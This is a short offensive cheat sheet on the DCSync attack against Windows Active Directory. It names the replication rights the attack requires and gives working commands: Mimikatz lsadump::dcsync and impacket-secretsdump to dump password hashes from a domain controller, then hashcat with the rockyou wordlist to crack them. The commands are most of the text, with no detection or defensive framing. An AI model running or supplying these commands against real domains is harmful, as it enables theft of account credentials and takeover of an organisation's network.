🔃Domain Controller Synchronization

To perform a DC Sync, the user needs to have those rights:

• Replicating Directory Changes

• Replicating Directory Changes All

• Replicating Directory Changes in Filtered Set

By default, members of Domain Admins, Enterprise Admins and Administrators groups have these rights assigned.

Windows

Using Mimikatz.

lsadump::dcsync /user:$DOMAIN$\$TARGET_USER$

Kali

impacket-secretsdump -just-dc-user $TARGET_USER$ $DOMAIN$/$USER$:"$PASSWORD$"@$DC_IP$

Once hash extracted from Kali or Windows, need to use hashcat to crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force